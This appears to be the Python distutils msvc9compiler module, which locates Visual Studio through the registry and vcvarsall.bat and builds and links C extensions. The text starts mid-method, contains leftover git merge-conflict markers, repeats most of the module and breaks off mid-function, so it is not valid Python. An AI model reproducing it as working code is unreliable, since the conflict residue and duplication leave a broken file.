vc_env = query_vcvarsall(VERSION, plat_spec)
self.__paths = vc_env['path'].split(os.pathsep)
os.environ['lib'] = vc_env['lib']
os.environ['include'] = vc_env['include']
if len(self.__paths) == 0:
raise DistutilsPlatformError("Python was built with %s, "
"and extensions need to be built with the same "
"version of the compiler, but it isn't installed."
% self.__product)
self.cc = self.find_exe("cl.exe")
self.linker = self.find_exe("link.exe")
self.lib = self.find_exe("lib.exe")
self.rc = self.find_exe("rc.exe") # resource compiler
self.mc = self.find_exe("mc.exe") # message compiler
#self.set_path_env_var('lib')
#self.set_path_env_var('include')
# extend the MSVC path with the current path
try:
for p in os.environ['path'].split(';'):
self.__paths.append(p)
except KeyError:
pass
self.__paths = normalize_and_reduce_paths(self.__paths)
os.environ['path'] = ";".join(self.__paths)
self.preprocess_options = None
if self.__arch == "x86":
self.compile_options = [ '/nologo', '/Ox', '/MD', '/W3',
'/DNDEBUG']
self.compile_options_debug = ['/nologo', '/Od', '/MDd', '/W3',
'/Z7', '/D_DEBUG']
else:
# Win64
self.compile_options = [ '/nologo', '/Ox', '/MD', '/W3', '/GS-' ,
'/DNDEBUG']
self.compile_options_debug = ['/nologo', '/Od', '/MDd', '/W3', '/GS-',
'/Z7', '/D_DEBUG']
self.ldflags_shared = ['/DLL', '/nologo', '/INCREMENTAL:NO']
if self.__version >= 7:
self.ldflags_shared_debug = [
'/DLL', '/nologo', '/INCREMENTAL:no', '/DEBUG', '/pdb:None'
]
self.ldflags_static = [ '/nologo']
self.initialized = True
# -- Worker methods ------------------------------------------------
def object_filenames(self,
source_filenames,
strip_dir=0,
output_dir=''):
# Copied from ccompiler.py, extended to return .res as 'object'-file
# for .rc input file
if output_dir is None: output_dir = ''
obj_names = []
for src_name in source_filenames:
(base, ext) = os.path.splitext (src_name)
base = os.path.splitdrive(base)[1] # Chop off the drive
base = base[os.path.isabs(base):] # If abs, chop off leading /
if ext not in self.src_extensions:
# Better to raise an exception instead of silently continuing
# and later complain about sources and targets having
# different lengths
raise CompileError ("Don't know how to compile %s" % src_name)
if strip_dir:
base = os.path.basename (base)
if ext in self._rc_extensions:
obj_names.append (os.path.join (output_dir,
base + self.res_extension))
elif ext in self._mc_extensions:
obj_names.append (os.path.join (output_dir,
base + self.res_extension))
else:
obj_names.append (os.path.join (output_dir,
base + self.obj_extension))
return obj_names
def compile(self, sources,
output_dir=None, macros=None, include_dirs=None, debug=0,
extra_preargs=None, extra_postargs=None, depends=None):
if not self.initialized:
self.initialize()
compile_info = self._setup_compile(output_dir, macros, include_dirs,
sources, depends, extra_postargs)
macros, objects, extra_postargs, pp_opts, build = compile_info
compile_opts = extra_preargs or []
compile_opts.append ('/c')
if debug:
compile_opts.extend(self.compile_options_debug)
else:
compile_opts.extend(self.compile_options)
for obj in objects:
try:
src, ext = build[obj]
except KeyError:
continue
if debug:
# pass the full pathname to MSVC in debug mode,
# this allows the debugger to find the source file
# without asking the user to browse for it
src = os.path.abspath(src)
if ext in self._c_extensions:
input_opt = "/Tc" + src
elif ext in self._cpp_extensions:
input_opt = "/Tp" + src
elif ext in self._rc_extensions:
# compile .RC to .RES file
input_opt = src
output_opt = "/fo" + obj
try:
self.spawn([self.rc] + pp_opts +
[output_opt] + [input_opt])
except DistutilsExecError as msg:
raise CompileError(msg)
continue
elif ext in self._mc_extensions:
# Compile .MC to .RC file to .RES file.
# * '-h dir' specifies the directory for the
# generated include file
# * '-r dir' specifies the target directory of the
# generated RC file and the binary message resource
# it includes
#
# For now (since there are no options to change this),
# we use the source-directory for the include file and
# the build directory for the RC file and message
# resources. This works at least for win32all.
h_dir = os.path.dirname(src)
rc_dir = os.path.dirname(obj)
try:
# first compile .MC to .RC and .H file
self.spawn([self.mc] +
['-h', h_dir, '-r', rc_dir] + [src])
base, _ = os.path.splitext (os.path.basename (src))
rc_file = os.path.join (rc_dir, base + '.rc')
# then compile .RC to .RES file
self.spawn([self.rc] +
["/fo" + obj] + [rc_file])
except DistutilsExecError as msg:
raise CompileError(msg)
continue
else:
# how to handle this file?
raise CompileError("Don't know how to compile %s to %s"
% (src, obj))
output_opt = "/Fo" + obj
try:
self.spawn([self.cc] + compile_opts + pp_opts +
[input_opt, output_opt] +
extra_postargs)
except DistutilsExecError as msg:
raise CompileError(msg)
return objects
def create_static_lib(self,
objects,
output_libname,
output_dir=None,
debug=0,
target_lang=None):
if not self.initialized:
self.initialize()
(objects, output_dir) = self._fix_object_args(objects, output_dir)
output_filename = self.library_filename(output_libname,
output_dir=output_dir)
if self._need_link(objects, output_filename):
lib_args = objects + ['/OUT:' + output_filename]
if debug:
pass # XXX what goes here?
try:
self.spawn([self.lib] + lib_args)
except DistutilsExecError as msg:
raise LibError(msg)
else:
log.debug("skipping %s (up-to-date)", output_filename)
def link(self,
target_desc,
objects,
output_filename,
output_dir=None,
libraries=None,
library_dirs=None,
runtime_library_dirs=None,
export_symbols=None,
debug=0,
extra_preargs=None,
extra_postargs=None,
build_temp=None,
target_lang=None):
if not self.initialized:
self.initialize()
(objects, output_dir) = self._fix_object_args(objects, output_dir)
fixed_args = self._fix_lib_args(libraries, library_dirs,
runtime_library_dirs)
(libraries, library_dirs, runtime_library_dirs) = fixed_args
if runtime_library_dirs:
self.warn ("I don't know what to do with 'runtime_library_dirs': "
+ str (runtime_library_dirs))
lib_opts = gen_lib_options(self,
library_dirs, runtime_library_dirs,
libraries)
if output_dir is not None:
output_filename = os.path.join(output_dir, output_filename)
if self._need_link(objects, output_filename):
if target_desc == CCompiler.EXECUTABLE:
if debug:
ldflags = self.ldflags_shared_debug[1:]
else:
ldflags = self.ldflags_shared[1:]
else:
if debug:
ldflags = self.ldflags_shared_debug
else:
ldflags = self.ldflags_shared
export_opts = []
for sym in (export_symbols or []):
export_opts.append("/EXPORT:" + sym)
ld_args = (ldflags + lib_opts + export_opts +
objects + ['/OUT:' + output_filename])
# The MSVC linker generates .lib and .exp files, which cannot be
# suppressed by any linker switches. The .lib files may even be
# needed! Make sure they are generated in the temporary build
# directory. Since they have different names for debug and release
# builds, they can go into the same directory.
build_temp = os.path.dirname(objects[0])
if export_symbols is not None:
(dll_name, dll_ext) = os.path.splitext(
os.path.basename(output_filename))
implib_file = os.path.join(
build_temp,
self.library_filename(dll_name))
ld_args.append ('/IMPLIB:' + implib_file)
self.manifest_setup_ldargs(output_filename, build_temp, ld_args)
if extra_preargs:
ld_args[:0] = extra_preargs
if extra_postargs:
ld_args.extend(extra_postargs)
self.mkpath(os.path.dirname(output_filename))
try:
self.spawn([self.linker] + ld_args)
except DistutilsExecError as msg:
raise LinkError(msg)
# embed the manifest
# XXX - this is somewhat fragile - if mt.exe fails, distutils
# will still consider the DLL up-to-date, but it will not have a
# manifest. Maybe we should link to a temp file? OTOH, that
# implies a build environment error that shouldn't go undetected.
mfinfo = self.manifest_get_embed_info(target_desc, ld_args)
if mfinfo is not None:
mffilename, mfid = mfinfo
out_arg = '-outputresource:%s;%s' % (output_filename, mfid)
try:
self.spawn(['mt.exe', '-nologo', '-manifest',
mffilename, out_arg])
except DistutilsExecError as msg:
raise LinkError(msg)
else:
log.debug("skipping %s (up-to-date)", output_filename)
def manifest_setup_ldargs(self, output_filename, build_temp, ld_args):
# If we need a manifest at all, an embedded manifest is recommended.
# See MSDN article titled
# "How to: Embed a Manifest Inside a C/C++ Application"
# (currently at http://msdn2.microsoft.com/en-us/library/ms235591(VS.80).aspx)
# Ask the linker to generate the manifest in the temp dir, so
# we can check it, and possibly embed it, later.
temp_manifest = os.path.join(
build_temp,
os.path.basename(output_filename) + ".manifest")
ld_args.append('/MANIFESTFILE:' + temp_manifest)
def manifest_get_embed_info(self, target_desc, ld_args):
# If a manifest should be embedded, return a tuple of
# (manifest_filename, resource_id). Returns None if no manifest
# should be embedded. See http://bugs.python.org/issue7833 for why
# we want to avoid any manifest for extension modules if we can)
for arg in ld_args:
if arg.startswith("/MANIFESTFILE:"):
temp_manifest = arg.split(":", 1)[1]
break
else:
# no /MANIFESTFILE so nothing to do.
return None
if target_desc == CCompiler.EXECUTABLE:
# by default, executables always get the manifest with the
# CRT referenced.
mfid = 1
else:
# Extension modules try and avoid any manifest if possible.
mfid = 2
temp_manifest = self._remove_visual_c_ref(temp_manifest)
if temp_manifest is None:
return None
return temp_manifest, mfid
def _remove_visual_c_ref(self, manifest_file):
try:
# Remove references to the Visual C runtime, so they will
# fall through to the Visual C dependency of Python.exe.
# This way, when installed for a restricted user (e.g.
# runtimes are not in WinSxS folder, but in Python's own
# folder), the runtimes do not need to be in every folder
# with .pyd's.
# Returns either the filename of the modified manifest or
# None if no manifest should be embedded.
manifest_f = open(manifest_file)
try:
manifest_buf = manifest_f.read()
finally:
manifest_f.close()
pattern = re.compile(
r"""<assemblyIdentity.*?name=("|')Microsoft\."""\
r"""VC\d{2}\.CRT("|').*?(/>|</assemblyIdentity>)""",
re.DOTALL)
manifest_buf = re.sub(pattern, "", manifest_buf)
pattern = "<dependentAssembly>\s*</dependentAssembly>"
manifest_buf = re.sub(pattern, "", manifest_buf)
# Now see if any other assemblies are referenced - if not, we
# don't want a manifest embedded.
pattern = re.compile(
r"""<assemblyIdentity.*?name=(?:"|')(.+?)(?:"|')"""
r""".*?(?:/>|</assemblyIdentity>)""", re.DOTALL)
if re.search(pattern, manifest_buf) is None:
return None
manifest_f = open(manifest_file, 'w')
try:
manifest_f.write(manifest_buf)
return manifest_file
finally:
manifest_f.close()
except OSError:
pass
# -- Miscellaneous methods -----------------------------------------
# These are all used by the 'gen_lib_options() function, in
# ccompiler.py.
def library_dir_option(self, dir):
return "/LIBPATH:" + dir
def runtime_library_dir_option(self, dir):
raise DistutilsPlatformError(
"don't know how to set runtime library search path for MSVC++")
def library_option(self, lib):
return self.library_filename(lib)
def find_library_file(self, dirs, lib, debug=0):
# Prefer a debugging library if found (and requested), but deal
# with it if we don't have one.
if debug:
try_names = [lib + "_d", lib]
else:
try_names = [lib]
for dir in dirs:
for name in try_names:
libfile = os.path.join(dir, self.library_filename (name))
if os.path.exists(libfile):
return libfile
else:
# Oops, didn't find it in *any* of 'dirs'
return None
# Helper methods for using the MSVC registry settings
def find_exe(self, exe):
"""Return path to an MSVC executable program.
Tries to find the program in several places: first, one of the
MSVC program search paths from the registry; next, the directories
in the PATH environment variable. If any of those work, return an
absolute path that is known to exist. If none of them work, just
return the original program name, 'exe'.
"""
for p in self.__paths:
fn = os.path.join(os.path.abspath(p), exe)
if os.path.isfile(fn):
return fn
# didn't find it; try existing path
for p in os.environ['Path'].split(';'):
fn = os.path.join(os.path.abspath(p),exe)
if os.path.isfile(fn):
return fn
return exe
>>>>>>> b875702c9c06ab5012e52ff4337439b03918f453
=======
"""distutils.msvc9compiler
Contains MSVCCompiler, an implementation of the abstract CCompiler class
for the Microsoft Visual Studio 2008.
The module is compatible with VS 2005 and VS 2008. You can find legacy support
for older versions of VS in distutils.msvccompiler.
"""
import os
import subprocess
import sys
import re
from distutils.errors import DistutilsExecError, DistutilsPlatformError, \
CompileError, LibError, LinkError
from distutils.ccompiler import CCompiler, gen_preprocess_options, \
gen_lib_options
from distutils import log
from distutils.util import get_platform
import winreg
RegOpenKeyEx = winreg.OpenKeyEx
RegEnumKey = winreg.EnumKey
RegEnumValue = winreg.EnumValue
RegError = winreg.error
HKEYS = (winreg.HKEY_USERS,
winreg.HKEY_CURRENT_USER,
winreg.HKEY_LOCAL_MACHINE,
winreg.HKEY_CLASSES_ROOT)
NATIVE_WIN64 = (sys.platform == 'win32' and sys.maxsize > 2**32)
if NATIVE_WIN64:
# Visual C++ is a 32-bit application, so we need to look in
# the corresponding registry branch, if we're running a
# 64-bit Python on Win64
VS_BASE = r"Software\Wow6432Node\Microsoft\VisualStudio\%0.1f"
WINSDK_BASE = r"Software\Wow6432Node\Microsoft\Microsoft SDKs\Windows"
NET_BASE = r"Software\Wow6432Node\Microsoft\.NETFramework"
else:
VS_BASE = r"Software\Microsoft\VisualStudio\%0.1f"
WINSDK_BASE = r"Software\Microsoft\Microsoft SDKs\Windows"
NET_BASE = r"Software\Microsoft\.NETFramework"
PLAT_TO_VCVARS = {
'win32' : 'x86',
'win-amd64' : 'amd64',
'win-ia64' : 'ia64',
}
class Reg:
"""Helper class to read values from the registry
"""
def get_value(cls, path, key):
for base in HKEYS:
d = cls.read_values(base, path)
if d and key in d:
return d[key]
raise KeyError(key)
get_value = classmethod(get_value)
def read_keys(cls, base, key):
"""Return list of registry keys."""
try:
handle = RegOpenKeyEx(base, key)
except RegError:
return None
L = []
i = 0
while True:
try:
k = RegEnumKey(handle, i)
except RegError:
break
L.append(k)
i += 1
return L
read_keys = classmethod(read_keys)
def read_values(cls, base, key):
"""Return dict of registry keys and values.
All names are converted to lowercase.
"""
try:
handle = RegOpenKeyEx(base, key)
except RegError:
return None
d = {}
i = 0
while True:
try:
name, value, type = RegEnumValue(handle, i)
except RegError:
break
name = name.lower()
d[cls.convert_mbcs(name)] = cls.convert_mbcs(value)
i += 1
return d
read_values = classmethod(read_values)
def convert_mbcs(s):
dec = getattr(s, "decode", None)
if dec is not None:
try:
s = dec("mbcs")
except UnicodeError:
pass
return s
convert_mbcs = staticmethod(convert_mbcs)
class MacroExpander:
def __init__(self, version):
self.macros = {}
self.vsbase = VS_BASE % version
self.load_macros(version)
def set_macro(self, macro, path, key):
self.macros["$(%s)" % macro] = Reg.get_value(path, key)
def load_macros(self, version):
self.set_macro("VCInstallDir", self.vsbase + r"\Setup\VC", "productdir")
self.set_macro("VSInstallDir", self.vsbase + r"\Setup\VS", "productdir")
self.set_macro("FrameworkDir", NET_BASE, "installroot")
try:
if version >= 8.0:
self.set_macro("FrameworkSDKDir", NET_BASE,
"sdkinstallrootv2.0")
else:
raise KeyError("sdkinstallrootv2.0")
except KeyError:
raise DistutilsPlatformError(
"""Python was built with Visual Studio 2008;
extensions must be built with a compiler than can generate compatible binaries.
Visual Studio 2008 was not found on this system. If you have Cygwin installed,
you can try compiling with MingW32, by passing "-c mingw32" to setup.py.""")
if version >= 9.0:
self.set_macro("FrameworkVersion", self.vsbase, "clr version")
self.set_macro("WindowsSdkDir", WINSDK_BASE, "currentinstallfolder")
else:
p = r"Software\Microsoft\NET Framework Setup\Product"
for base in HKEYS:
try:
h = RegOpenKeyEx(base, p)
except RegError:
continue
key = RegEnumKey(h, 0)
d = Reg.get_value(base, r"%s\%s" % (p, key))
self.macros["$(FrameworkVersion)"] = d["version"]
def sub(self, s):
for k, v in self.macros.items():
s = s.replace(k, v)
return s
def get_build_version():
"""Return the version of MSVC that was used to build Python.
For Python 2.3 and up, the version number is included in
sys.version. For earlier versions, assume the compiler is MSVC 6.
"""
prefix = "MSC v."
i = sys.version.find(prefix)
if i == -1:
return 6
i = i + len(prefix)
s, rest = sys.version[i:].split(" ", 1)
majorVersion = int(s[:-2]) - 6
minorVersion = int(s[2:3]) / 10.0
# I don't think paths are affected by minor version in version 6
if majorVersion == 6:
minorVersion = 0
if majorVersion >= 6:
return majorVersion + minorVersion
# else we don't know what version of the compiler this is
return None
def normalize_and_reduce_paths(paths):
"""Return a list of normalized paths with duplicates removed.
The current order of paths is maintained.
"""
# Paths are normalized so things like: /a and /a/ aren't both preserved.
reduced_paths = []
for p in paths:
np = os.path.normpath(p)
# XXX(nnorwitz): O(n**2), if reduced_paths gets long perhaps use a set.
if np not in reduced_paths:
reduced_paths.append(np)
return reduced_paths
def removeDuplicates(variable):
"""Remove duplicate values of an environment variable.
"""
oldList = variable.split(os.pathsep)
newList = []
for i in oldList:
if i not in newList:
newList.append(i)
newVariable = os.pathsep.join(newList)
return newVariable
def find_vcvarsall(version):
"""Find the vcvarsall.bat file
At first it tries to find the productdir of VS 2008 in the registry. If
that fails it falls back to the VS90COMNTOOLS env var.
"""
vsbase = VS_BASE % version
try:
productdir = Reg.get_value(r"%s\Setup\VC" % vsbase,
"productdir")
except KeyError:
log.debug("Unable to find productdir in registry")
productdir = None
if not productdir or not os.path.isdir(productdir):
toolskey = "VS%0.f0COMNTOOLS" % version
toolsdir = os.environ.get(toolskey, None)
if toolsdir and os.path.isdir(toolsdir):
productdir = os.path.join(toolsdir, os.pardir, os.pardir, "VC")
productdir = os.path.abspath(productdir)
if not os.path.isdir(productdir):
log.debug("%s is not a valid directory" % productdir)
return None
else:
log.debug("Env var %s is not set or invalid" % toolskey)
if not productdir:
log.debug("No productdir found")
return None
vcvarsall = os.path.join(productdir, "vcvarsall.bat")
if os.path.isfile(vcvarsall):
return vcvarsall
log.debug("Unable to find vcvarsall.bat")
return None
def query_vcvarsall(version, arch="x86"):
"""Launch vcvarsall.bat and read the settings from its environment
"""
vcvarsall = find_vcvarsall(version)
interesting = set(("include", "lib", "libpath", "path"))
result = {}
if vcvarsall is None:
raise DistutilsPlatformError("Unable to find vcvarsall.bat")
log.debug("Calling 'vcvarsall.bat %s' (version=%s)", arch, version)
popen = subprocess.Popen('"%s" %s & set' % (vcvarsall, arch),
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
try:
stdout, stderr = popen.communicate()
if popen.wait() != 0:
raise DistutilsPlatformError(stderr.decode("mbcs"))
stdout = stdout.decode("mbcs")
for line in stdout.split("\n"):
line = Reg.convert_mbcs(line)
if '=' not in line:
continue
line = line.strip()
key, value = line.split('=', 1)
key = key.lower()
if key in interesting:
if value.endswith(os.pathsep):
value = value[:-1]
result[key] = removeDuplicates(value)
finally:
popen.stdout.close()
popen.stderr.close()
if len(result) != len(interesting):
raise ValueError(str(list(result.keys())))
return result
VERSION = get_build_version()
if VERSION < 8.0:
raise DistutilsPlatformError("VC %0.1f is not supported by this module" % VERSION)
class MSVCCompiler(CCompiler) :
"""Concrete class that implements an interface to Microsoft Visual C++,
as defined by the CCompiler abstract class."""
compiler_type = 'msvc'
# Just set this so CCompiler's constructor doesn't barf. We currently
# don't use the 'set_executables()' bureaucracy provided by CCompiler,
# as it really isn't necessary for this sort of single-compiler class.
# Would be nice to have a consistent interface with UnixCCompiler,
# though, so it's worth thinking about.
executables = {}
# Private class data (need to distinguish C from C++ source for compiler)
_c_extensions = ['.c']
_cpp_extensions = ['.cc', '.cpp', '.cxx']
_rc_extensions = ['.rc']
_mc_extensions = ['.mc']
# Needed for the filename generation methods provided by the
# base class, CCompiler.
src_extensions = (_c_extensions + _cpp_extensions +
_rc_extensions + _mc_extensions)
res_extension = '.res'
obj_extension = '.obj'
static_lib_extension = '.lib'
shared_lib_extension = '.dll'
static_lib_format = shared_lib_format = '%s%s'
exe_extension = '.exe'
def __init__(self, verbose=0, dry_run=0, force=0):
CCompiler.__init__ (self, verbose, dry_run, force)
self.__version = VERSION
self.__root = r"Software\Microsoft\VisualStudio"
# self.__macros = MACROS
self.__paths = []
# target platform (.plat_name is consistent with 'bdist')
self.plat_name = None
self.__arch = None # deprecated name
self.initialized = False
def initialize(self, plat_name=None):
# multi-init means we would need to check platform same each time...
assert not self.initialized, "don't init multiple times"
if plat_name is None:
plat_name = get_platform()
# sanity check for platforms to prevent obscure errors later.
ok_plats = 'win32', 'win-amd64', 'win-ia64'
if plat_name not in ok_plats:
raise DistutilsPlatformError("--plat-name must be one of %s" %
(ok_plats,))
if "DISTUTILS_USE_SDK" in os.environ and "MSSdk" in os.environ and self.find_exe("cl.exe"):
# Assume that the SDK set up everything alright; don't try to be
# smarter
self.cc = "cl.exe"
self.linker = "link.exe"
self.lib = "lib.exe"
self.rc = "rc.exe"
self.mc = "mc.exe"
else:
# On x86, 'vcvars32.bat amd64' creates an env that doesn't work;
# to cross compile, you use 'x86_amd64'.
# On AMD64, 'vcvars32.bat amd64' is a native build env; to cross
# compile use 'x86' (ie, it runs the x86 compiler directly)
# No idea how itanium handles this, if at all.
if plat_name == get_platform() or plat_name == 'win32':
# native build or cross-compile to win32
plat_spec = PLAT_TO_VCVARS[plat_name]
else:
# cross compile from win32 -> some 64bit
plat_spec = PLAT_TO_VCVARS[get_platform()] + '_' + \
PLAT_TO_VCVARS[plat_name]
vc_env = query_vcvarsall(VERSION, plat_spec)
self.__paths = vc_env['path'].split(os.pathsep)
os.environ['lib'] = vc_env['lib']
os.environ['include'] = vc_env['include']
if len(self.__paths) == 0:
raise DistutilsPlatformError("Python was built with %s, "
"and extensions need to be built with the same "
"version of the compiler, but it isn't installed."
% self.__product)
self.cc = self.find_exe("cl.exe")
self.linker = self.find_exe("link.exe")
self.lib = self.find_exe("lib.exe")
self.rc = self.find_exe("rc.exe") # resource compiler
self.mc = self.find_exe("mc.exe") # message compiler
#self.set_path_env_var('lib')
#self.set_path_env_var('include')
# extend the MSVC path with the current path
try:
for p in os.environ['path'].split(';'):
self.__paths.append(p)
except KeyError:
pass
self.__paths = normalize_and_reduce_paths(self.__paths)
os.environ['path'] = ";".join(self.__paths)
self.preprocess_options = None
if self.__arch == "x86":
self.compile_options = [ '/nologo', '/Ox', '/MD', '/W3',
'/DNDEBUG']
self.compile_options_debug = ['/nologo', '/Od', '/MDd', '/W3',
'/Z7', '/D_DEBUG']
else:
# Win64
self.compile_options = [ '/nologo', '/Ox', '/MD', '/W3', '/GS-' ,
'/DNDEBUG']
self.compile_options_debug = ['/nologo', '/Od', '/MDd', '/W3', '/GS-',
'/Z7', '/D_DEBUG']
self.ldflags_shared = ['/DLL', '/nologo', '/INCREMENTAL:NO']
if self.__version >= 7:
self.ldflags_shared_debug = [
'/DLL', '/nologo', '/INCREMENTAL:no', '/DEBUG', '/pdb:None'
]
self.ldflags_static = [ '/nologo']
self.initialized = True
# -- Worker methods ------------------------------------------------
def object_filenames(self,
source_filenames,
strip_dir=0,
output_dir=''):
# Copied from ccompiler.py, extended to return .res as 'object'-file
# for .rc input file
if output_dir is None: output_dir = ''
obj_names = []
for src_name in source_filenames:
(base, ext) = os.path.splitext (src_name)
base = os.path.splitdrive(base)[1] # Chop off the drive
base = base[os.path.isabs(base):] # If abs, chop off leading /
if ext not in self.src_extensions:
# Better to raise an exception instead of silently continuing
# and later complain about sources and targets having
# different lengths
raise CompileError ("Don't know how to compile %s" % src_name)
if strip_dir:
base = os.path.basename (base)
if ext in self._rc_extensions:
obj_names.append (os.path.join (output_dir,
base + self.res_extension))
elif ext in self._mc_extensions:
obj_names.append (os.path.join (output_dir,
base + self.res_extension))
else:
obj_names.append (os.path.join (output_dir,
base + self.obj_extension))
return obj_names
def compile(self, sources,
output_dir=None, macros=None, include_dirs=None, debug=0,
extra_preargs=None, extra_postargs=None, depends=None):
if not self.initialized:
self.initialize()
compile_info = self._setup_compile(output_dir, macros, include_dirs,
sources, depends, extra_postargs)
macros, objects, extra_postargs, pp_opts, build = compile_info
compile_opts = extra_preargs or []
compile_opts.append ('/c')
if debug:
compile_opts.extend(self.compile_options_debug)
else:
compile_opts.extend(self.compile_options)
for obj in objects:
try:
src, ext = build[obj]
except KeyError:
continue
if debug:
# pass the full pathname to MSVC in debug mode,
# this allows the debugger to find the source file
# without asking the user to browse for it
src = os.path.abspath(src)
if ext in self._c_extensions:
input_opt = "/Tc" + src
elif ext in self._cpp_extensions:
input_opt = "/Tp" + src
elif ext in self._rc_extensions:
# compile .RC to .RES file
input_opt = src
output_opt = "/fo" + obj
try:
self.spawn([self.rc] + pp_opts +
[output_opt] + [input_opt])
except DistutilsExecError as msg:
raise CompileError(msg)
continue
elif ext in self._mc_extensions:
# Compile .MC to .RC file to .RES file.
# * '-h dir' specifies the directory for the
# generated include file
# * '-r dir' specifies the target directory of the
# generated RC file and the binary message resource
# it includes
#
# For now (since there are no options to change this),
# we use the source-directory for the include file and
# the build directory for the RC file and message
# resources. This works at least for win32all.
h_dir = os.path.dirname(src)
rc_dir = os.path.dirname(obj)
try:
# first compile .MC to .RC and .H file
self.spawn([self.mc] +
['-h', h_dir, '-r', rc_dir] + [src])
base, _ = os.path.splitext (os.path.basename (src))
rc_file = os.path.join (rc_dir, base + '.rc')
# then compile .RC to .RES file
self.spawn([self.rc] +
["/fo" + obj] + [rc_file])
except DistutilsExecError as msg:
raise CompileError(msg)
continue
else:
# how to handle this file?
raise CompileError("Don't know how to compile %s to %s"
% (src, obj))
output_opt = "/Fo" + obj
try:
self.spawn([self.cc] + compile_opts + pp_opts +
[input_opt, output_opt] +
extra_postargs)
except DistutilsExecError as msg:
raise CompileError(msg)
return objects
def create_static_lib(self,
objects,
output_libname,
output_dir=None,
debug=0,
target_lang=None):
if not self.initialized:
self.initialize()
(objects, output_dir) = self._fix_object_args(objects, output_dir)
output_filename = self.library_filename(output_libname,
output_dir=output_dir)
if self._need_link(objects, output_filename):
lib_args = objects + ['/OUT:' + output_filename]
if debug:
pass # XXX what goes here?
try:
self.spawn([self.lib] + lib_args)
except DistutilsExecError as msg:
raise LibError(msg)
else:
log.debug("skipping %s (up-to-date)", output_filename)
def link(self,
target_desc,
objects,
output_filename,
output_dir=None,
libraries=None,
library_dirs=None,
runtime_library_dirs=None,
export_symbols=None,
debug=0,
extra_preargs=None,
extra_postargs=None,
build_temp=None,
target_lang=None):
if not self.initialized:
self.initialize()
(objects, output_dir) = self._fix_object_args(objects, output_dir)
fixed_args = self._fix_lib_args(libraries, library_dirs,
runtime_library_dirs)
(libraries, library_dirs, runtime_library_dirs) = fixed_args
if runtime_library_dirs:
self.warn ("I don't know what to do with 'runtime_library_dirs': "
+ str (runtime_library_dirs))
lib_opts = gen_lib_options(self,
library_dirs, runtime_library_dirs,
libraries)
if output_dir is not None:
output_filename = os.path.join(output_dir, output_filename)
if self._need_link(objects, output_filename):
if target_desc == CCompiler.EXECUTABLE:
if debug:
ldflags = self.ldflags_shared_debug[1:]
else:
ldflags = self.ldflags_shared[1:]
else:
if debug:
ldflags = self.ldflags_shared_debug
else:
ldflags = self.ldflags_shared
export_opts = []
for sym in (export_symbols or []):
export_opts.append("/EXPORT:" + sym)
ld_args = (ldflags + lib_opts + export_opts +
objects + ['/OUT:' + output_filename])
# The MSVC linker generates .lib and .exp files, which cannot be
# suppressed by any linker switches. The .lib files may even be
# needed! Make sure they are generated in the temporary build
# directory. Since they have different names for debug and release
# builds, they can go into the same directory.
build_temp = os.path.dirname(objects[0])
if export_symbols is not None:
(dll_name, dll_ext) = os.path.splitext(
os.path.basename(output_filename))
implib_file = os.path.join(
build_temp,
self.library_filename(dll_name))
ld_args.append ('/IMPLIB:' + implib_file)
self.manifest_setup_ldargs(output_filename, build_temp, ld_args)
if extra_preargs:
ld_args[:0] = extra_preargs
if extra_postargs:
ld_args.extend(extra_postargs)
self.mkpath(os.path.dirname(output_filename))
try:
self.spawn([self.linker] + ld_args)
except DistutilsExecError as msg:
raise LinkError(msg)
# embed the manifest
# XXX - this is somewhat fragile - if mt.exe fails, distutils
# will still consider the DLL up-to-date, but it will not have a
# manifest. Maybe we should link to a temp file? OTOH, that
# implies a build environment error that shouldn't go undetected.
mfinfo = self.manifest_get_embed_info(target_desc, ld_args)
if mfinfo is not None:
mffilename, mfid = mfinfo
out_arg = '-outputresource:%s;%s' % (output_filename, mfid)
try:
self.spawn(['mt.exe', '-nologo', '-manifest',
mffilename, out_arg])
except DistutilsExecError as msg:
raise LinkError(msg)
else:
log.debug("skipping %s (up-to-date)", output_filename)
def manifest_setup_ldargs(self, output_filename, build_temp, ld_args):
# If we need a manifest at all, an embedded manifest is recommended.
# See MSDN article titled
# "How to: Embed a Manifest Inside a C/C++ Application"
# (currently at http://msdn2.microsoft.com/en-us/library/ms235591(VS.80).aspx)
# Ask the linker to generate the manifest in the temp dir, so
# we can check it, and possibly embed it, later.
temp_manifest = os.path.join(
build_temp,
os.path.basename(output_filename) + ".manifest")
ld_args.append('/MANIFESTFILE:' + temp_manifest)
def manifest_get_embed_info(self, target_desc, ld_args):
# If a manifest should be embedded, return a tuple of
# (manifest_filename, resource_id). Returns None if no manifest
# should be embedded. See http://bugs.python.org/issue7833 for why
# we want to avoid any manifest for extension modules if we can)
for arg in ld_args:
if arg.startswith("/MANIFESTFILE:"):
temp_manifest = arg.split(":", 1)[1]
break
else:
# no /MANIFESTFILE so nothing to do.
return None
if target_desc == CCompiler.EXECUTABLE:
# by default, executables always get the manifest with the
# CRT referenced.
mfid = 1
else:
# Extension modules try and avoid any manifest if possible.
mfid = 2
temp_manifest = self._remove_visual_c_ref(temp_manifest)
if temp_manifest is None:
return None
return temp_manifest, mfid
def _remove_visual_c_ref(self, manifest_file):
try:
# Remove references to the Visual C runtime, so they will
# fall through to the Visual C dependency of Python.exe.
# This way, when installed for a restricted user (e.g.
# runtimes are not in WinSxS folder, but in Python's own
# folder), the runtimes do not need to be in every folder
# with .pyd's.
# Returns either the filename of the modified manifest or
# None if no manifest should be embedded.
manifest_f = open(manifest_file)
try:
manifest_buf = manifest_f.read()
finally:
manifest_f.close()
pattern = re.compile(
r"""<assemblyIdentity.*?name=("|')Microsoft\."""\
r"""VC\d{2}\.CRT("|').*?(/>|</assemblyIdentity>)""",
re.DOTALL)
manifest_buf = re.sub(pattern, "", manifest_buf)
pattern = "<dependentAssembly>\s*</dependentAssembly>"
manifest_buf = re.sub(pattern, "", manifest_buf)
# Now see if any other assemblies are referenced - if not, we
# don't want a manifest embedded.
pattern = re.compile(
r"""<assemblyIdentity.*?name=(?:"|')(.+?)(?:"|')"""
r""".*?(?:/>|</assemblyIdentity>)""", re.DOTALL)
if re.search(pattern, manifest_buf) is None:
return None
manifest_f = open(manifest_file, 'w')
try:
manifest_f.write(manifest_buf)
return manifest_file
finally:
manifest_f.close()
except OSError:
pass
# -- Miscellaneous methods -----------------------------------------
# These are all used by the 'gen_lib_options() function, in
# ccompiler.py.
def library_dir_option(self, dir):
return "/LIBPATH:" + dir
def runtime_library_dir_option(self, dir):
raise DistutilsPlatformError(
"don't know how to set runtime library search path for MSVC++")
def library_option(self, lib):
return self.library_filename(lib)
def find_library_file(self, dirs, lib, debug=0):
